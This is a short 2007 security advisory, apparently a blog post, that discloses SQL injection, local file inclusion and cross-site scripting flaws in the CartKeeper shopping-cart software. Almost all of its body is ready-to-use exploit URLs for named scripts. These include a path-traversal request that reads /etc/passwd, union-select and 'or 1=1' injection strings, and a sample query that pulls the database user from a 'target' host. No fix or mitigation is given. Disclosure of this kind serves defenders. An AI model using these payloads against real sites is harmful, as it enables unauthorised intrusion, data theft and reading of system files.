Monday, July 9, 2007

SQL-Injection, local-include, xss in CartKeeper

Advisory: SQL-Injection, local-include, xss in CartKeeper

Home Page: http://www.cartkeeper.com/
Vulnerability:
SQL-injection,local-include,xss.
Vulnerable scripts: index.php,ckuser.php,display_page.php
#Xss:
http://localhost/index.php?page=5&keyword=%27&cond=[XSS]
http://localhost/index.php?page=5&keyword=">[XSS]
#Local-include:
http://localhost/ckuser.php?pg=../../../../../../../../../../etc/passwd
#Sql-injection:
http://localhost/display_page.php?i=-1+union+select+1,2,3,4/*
http://localhost/index.php?maincat=-1+or+1=1/*
#Example:
http://target/display_page.php?i=-1+union+select+1,User(),3,4/*

No comments: